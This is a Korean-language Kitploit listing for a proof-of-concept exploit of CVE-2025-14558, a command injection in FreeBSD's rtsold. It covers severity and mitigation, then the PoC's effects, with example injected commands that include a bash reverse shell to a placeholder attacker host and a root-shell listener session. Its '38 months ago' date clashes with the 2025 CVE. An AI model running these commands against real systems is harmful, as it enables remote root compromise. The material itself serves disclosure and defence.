Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Blackash-CVE-2025-14558 — CVE-2025-14558 | Kitploit
도구/GitHubGitHub/rockmelodies/blackash-cve-2025-14558
Payload GenerationVulnerability AnalysisExploitationNetwork SecurityPenetration TestingCommand and Control
GitHubrockmelodies/blackash-cve-2025-14558

Blackash-CVE-2025-14558

CVE-2025-14558

저장소 보기
38개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2025-14558 : FreeBSD (IPv6)의 심각한 원격 코드 실행

G8195ymXcAAjXC2

🧠 개요

CVE-2025-14558은 IPv6 라우터 요청 서비스를 사용하는 FreeBSD 시스템에 영향을 미치는 심각한 원격 코드 실행(RCE) 취약점입니다. 신뢰할 수 없는 네트워크 입력 처리 방식의 결함으로 인해 공격자가 임의의 셸 명령을 실행할 수 있습니다.


📊 심각도

  • CVSS v3 점수: 9.8 / 10 🔥
  • 위험 수준: 심각
  • 필요 권한: 없음
  • 사용자 상호작용: 없음

🎯 영향을 받는 구성 요소

  • rtsol(8)
  • rtsold(8)
  • **IPv6 Stateless Address Autoconfiguration (SLAAC)**를 사용하는 FreeBSD 시스템

⚙️ 기술 세부 사항

  • 악성 IPv6 라우터 광고(RA) 패킷에 조작된 도메인 검색 목록 옵션이 포함될 수 있습니다.
  • 입력이 resolvconf(8)에 안전하지 않게 전달됩니다.
  • 부적절한 셸 인용으로 인해 명령 주입이 가능합니다.
  • 결과적으로 루트 권한으로 임의 명령 실행이 발생합니다.

🕸️ 공격 벡터

  • 🌐 네트워크 기반
  • 📍 공격자는 동일한 로컬 네트워크 세그먼트에 있어야 합니다.
  • 인증이나 자격 증명이 필요하지 않습니다.

💥 영향

성공적으로 악용되면 공격자는 다음을 수행할 수 있습니다:

  • 전체 시스템 장악
  • 임의 명령 실행
  • 시스템 구성 변경
  • 지속성 또는 측면 이동 구축

🧪 익스플로잇 가용성

  • ✅ 공개 개념 증명(PoC) 존재
  • 조작된 IPv6 RA 패킷을 통한 명령 실행을 시연합니다.

🛡️ 완화 및 방어

강력히 권장되는 조치:

  • 🔧 공식 FreeBSD 보안 패치 적용
  • 🚫 IPv6 RA가 필요하지 않은 경우 rtsol/rtsold 비활성화
  • 🔒 신뢰할 수 없는 IPv6 라우터 광고 필터링 또는 차단
  • 🧱 네트워크 분할을 사용하여 로컬 공격자 노출 제한

📝 핵심 요점

신뢰할 수 없는 네트워크에서 IPv6 라우터 광고를 수신하는 모든 FreeBSD 시스템은 높은 위험에 처해 있습니다. 즉시 패치하거나 영향을 받는 서비스를 비활성화하십시오.


CVE-2025-14558에 대한 PoC 스크립트가 취약한 FreeBSD 시스템(패치되지 않았고, rtsold가 실행 중이며 IPv6 RA 메시지를 처리하는 상태)에서 성공적으로 작동하는 경우:

대상(취약한 FreeBSD 머신)에서:

  • 주입된 명령이 즉시 루트로 실행됩니다(rtsold가 루트로 실행되고 악성 도메인으로 /sbin/resolvconf를 호출하기 때문).
  • 기본적으로 콘솔이나 로그에 눈에 띄는 출력이 나타나지 않습니다(명령이 백그라운드에서 조용히 실행됨).
  • 발생하는 상황의 예:
    • --command "id > /tmp/pwned"와 같은 간단한 테스트의 경우:

      • 다음과 같은 출력이 포함된 /tmp/pwned 파일이 생성됩니다:

        root@kitploit:~
        uid=0(root) gid=0(wheel) groups=0(wheel)
        
    • --command "touch /tmp/exploit_success"의 경우:

      • 빈 파일 /tmp/exploit_success가 나타납니다.
    • --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"와 같은 리버스 셸의 경우:

      • 대상에 즉시 눈에 띄는 변화는 없지만, 리스너에 연결을 시도합니다.

다음과 같은 명령으로 대상에서 확인하십시오:

root@kitploit:~
ls -l /tmp/pwned
cat /tmp/pwned

공격자 측(스크립트 실행)에서:

  • 스크립트 출력:

    root@kitploit:~
    [+] Sending malicious RA on eth0
    [+] Injected command: id > /tmp/pwned
    [+] Target must run vulnerable rtsold and process the RA
    [+] Done. Check target for execution (e.g. /tmp/pwned)
    
    
  • 리버스 셸의 경우: 성공하면 nc -lvnp 4444가 연결을 수신하고 루트 셸을 얻습니다:

    root@kitploit:~
    listening on [any] 4444 ...
    connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
    bash: cannot set terminal process groups: No job control in this shell
    bash: no job control in this shell
    root@vulnerable-host:~ #
    

    (이제 루트 셸을 획득했습니다 – id, whoami 등의 명령을 입력하십시오.)

작동하지 않는 경우:

  • 파일이 생성되지 않거나 연결이 없음 → 이유: 대상이 패치됨, rtsold가 실행 중이 아님, 동일한 L2 네트워크에 없음, 방화벽이 RA를 차단함, 또는 IPv6가 비활성화됨.

이는 취약한(2025년 12월 16일 패치 이전) FreeBSD 시스템의 통제된 실험실에서만 관찰 가능합니다. 2025년 12월 23일 기준 공개된 실제 악용 사례는 없습니다. 프로덕션 환경에서는 즉시 패치하십시오.


⚠️ 면책 조항: 이 정보는 정보 제공 목적으로만 제공되며 보안, 법률 또는 운영 조언을 구성하지 않습니다. 수정 조치를 취하기 전에 항상 공식 공급업체 권고, 패치 및 지침을 검토하고 따르십시오.

도구 다운로드